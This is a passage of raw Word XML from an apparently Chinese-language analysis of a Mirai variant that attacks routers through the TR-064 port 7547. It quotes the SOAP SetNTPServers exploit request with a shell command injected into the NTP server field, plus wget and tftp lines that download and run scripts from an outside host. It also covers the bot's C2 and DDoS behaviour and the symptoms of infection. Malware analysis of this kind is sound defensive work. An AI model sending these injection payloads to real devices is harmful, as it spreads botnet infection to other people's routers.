          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>:Envelope</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B01A51">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t xml:space="preserve"> xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"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SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"&gt;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&lt;SOAP-ENV</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B01A51">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>:Body</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B01A51">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; &lt;u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"&gt;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&lt;NewNTPServer1&gt;</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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B01A51">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>cd</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B01A51">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t xml:space="preserve"> /tmp;wget http://l.ocalhost[.]</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B01A51">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>host/1;</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B01A51">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>chmod 777 1;./1</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&lt;/NewNTPServer1&gt;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&lt;NewNTPServer2&gt;&lt;/NewNTPServer2&gt;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&lt;NewNTPServer3&gt;&lt;/NewNTPServer3&gt;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&lt;NewNTPServer4&gt;&lt;/NewNTPServer4&gt;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 xml:space="preserve">&lt;NewNTPServer5&gt;&lt;/NewNTPServer5&gt;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&lt;/u</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B01A51">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>:SetNTPServers</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B01A51">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B01A51" w:rsidRPr="00B01A51" w:rsidRDefault="00B01A51" w:rsidP="00B01A51">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color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>&lt;/SOAP-ENV</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B01A51">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>:Body</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B01A51">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>&gt;&lt;/SOAP-ENV:Envelope&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E6248" w:rsidRDefault="003E6248">
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC028D" w:rsidRPr="000F6CCA" w:rsidRDefault="00AC028D">
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>这段报文的工作原理可参考</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:id w:val="-806926019"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEnd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Ken16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 xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidRPr="00AC028D">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:noProof/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t>[11]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E6248" w:rsidRPr="000F6CCA" w:rsidRDefault="003E6248" w:rsidP="003E6248">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="330" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="000F6CCA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过busybox执行如下命令关闭7547端口，防止其他相似样本利用漏洞对该设备进行攻击。通过查询端口31517相关的进程，将其终止。之后，绑定31517端口，进行监听。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E6248" w:rsidRPr="00B01A51" w:rsidRDefault="003E6248" w:rsidP="003E6248">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="330" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B01A51">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="eastAsia"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t xml:space="preserve">iptables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A INPUT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p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tcp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 xml:space="preserve">destination-port 7547 </w:t>
      </w:r>
      <w:r w:rsidRPr="00B01A51">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="eastAsia"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00B01A51">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:hint="eastAsia"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>j DROP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C34ADB" w:rsidRPr="000F6CCA" w:rsidRDefault="00C34ADB" w:rsidP="003E6248">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="330" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C34ADB" w:rsidRDefault="00C34ADB" w:rsidP="003E6248">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="330" w:lineRule="atLeast"/>
        <w:ind w:firstLine="480"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:r w:rsidRPr="000F6CCA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对随机生成的IP地址进行扫描，向端口31517发送数据包</w:t>
      </w:r>
      <w:r w:rsidR="008637CC">
        <w:rPr>
          <w:rStyle w:val="a6"/>
        </w:rPr>
        <w:footnoteReference w:id="6"/>
      </w:r>
      <w:r w:rsidRPr="000F6CCA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，用以确认是否被感染，如果未被感染，则向目标主机发送包含攻击代码的数据包</w:t>
      </w:r>
      <w:r w:rsidR="00D32442" w:rsidRPr="000F6CCA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00900F11" w:rsidRPr="000F6CCA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第一段长度为746的数据包，第二段长度为756的数据包内容，均为XML over</w:t>
      </w:r>
      <w:r w:rsidR="00900F11" w:rsidRPr="000F6CCA">
        <w:t xml:space="preserve"> HTTP内容</w:t>
      </w:r>
      <w:r w:rsidR="002B51AB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，其中内嵌恶意脚本，分别为：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B51AB" w:rsidRDefault="002B51AB" w:rsidP="003E6248">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="330" w:lineRule="atLeast"/>
        <w:ind w:firstLine="360"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>cd</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t xml:space="preserve"> /tmp;wget http://p.ocalhost.host/x.sh;chmod 777 x.sh;./x.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B51AB" w:rsidRPr="000F6CCA" w:rsidRDefault="002B51AB" w:rsidP="003E6248">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="330" w:lineRule="atLeast"/>
        <w:ind w:firstLine="360"/>
        <w:textAlignment w:val="baseline"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>cd</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t xml:space="preserve"> /tmp;tftp -l y.sh -r tftp.sh -g p.ocalhost.host;chmod 777 y.sh;./y.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00352BFE" w:rsidRDefault="00352BFE" w:rsidP="003E6248">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="330" w:lineRule="atLeast"/>
        <w:ind w:firstLine="360"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4C4C4C"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E25DC8" w:rsidRPr="00E25DC8" w:rsidRDefault="000F6CCA" w:rsidP="00E25DC8">
      <w:pPr>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F6CCA">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>完成以上三个流程之后，回到主流程中。首先查询内置的服务器列表中的IP地址和端口号，尝试进行连接，连接成功则</w:t>
      </w:r>
      <w:r w:rsidRPr="00E25DC8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>发送上线包，数据包中的内容是</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E25DC8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>\x00\x00</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E25DC8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>\x00\x01</w:t>
      </w:r>
      <w:r w:rsidR="00E25DC8" w:rsidRPr="00E25DC8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00E25DC8" w:rsidRPr="00E25DC8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>与主控通信成功后</w:t>
      </w:r>
      <w:r w:rsidR="00E25DC8" w:rsidRPr="00E25DC8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00E25DC8" w:rsidRPr="00E25DC8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>会不断查询主控下发的DDoS攻击命令</w:t>
      </w:r>
      <w:r w:rsidR="00E25DC8" w:rsidRPr="00E25DC8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003E6248" w:rsidRPr="00E25DC8" w:rsidRDefault="003E6248">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00757648" w:rsidRPr="003E6248" w:rsidRDefault="00757648" w:rsidP="00757648">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc469905250"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>鉴别与防护</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w:rsidR="00757648" w:rsidRDefault="009235AA" w:rsidP="00E25DC8">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc469905251"/>
      <w:r>
        <w:t>受</w:t>
      </w:r>
      <w:r w:rsidR="00757648">
        <w:t>感染主机</w:t>
      </w:r>
      <w:r>
        <w:t>的症状与鉴别方式</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p w:rsidR="009235AA" w:rsidRPr="009235AA" w:rsidRDefault="009235AA" w:rsidP="009235AA">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009235AA">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>在扫描到IP地址之后，Mirai会通过一系列常用的默认用户名和密码辨别出易受攻击的设备，然后登录这些设备以注入Mirai软件。受感染的设备会继续正常工作，不过偶尔会出现卡顿，而且带宽消耗会增大。设备在重新启动之前将一直保持受感染的状态。设备重启之后，除非用户立刻修改密码，几分钟之内设备很快会被再次感染</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:id w:val="1027376449"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidRPr="009235AA">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="009235AA">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidRPr="009235AA">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText>CITATION Wik16 \l 2052</w:instrText>
          </w:r>
          <w:r w:rsidRPr="009235AA">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidRPr="009235AA">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[6]</w:t>
          </w:r>
          <w:r w:rsidRPr="009235AA">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidRPr="009235AA">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009235AA" w:rsidRDefault="009235AA" w:rsidP="009235AA">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009235AA">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>一个来自波兰的网络管理员发现自己的路由器每隔</w:t>
      </w:r>
      <w:r w:rsidRPr="009235AA">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>15-</w:t>
      </w:r>
      <w:r w:rsidRPr="009235AA">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>20分钟就重启一次</w:t>
      </w:r>
      <w:r w:rsidRPr="009235AA">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="009235AA">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>经检查发现</w:t>
      </w:r>
      <w:r w:rsidRPr="009235AA">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>NTP服务器配置项多了一行恶意命令</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:id w:val="-745798873"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidRPr="009235AA">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="009235AA">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidRPr="009235AA">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText>CITATION Bad \l 2052</w:instrText>
          </w:r>
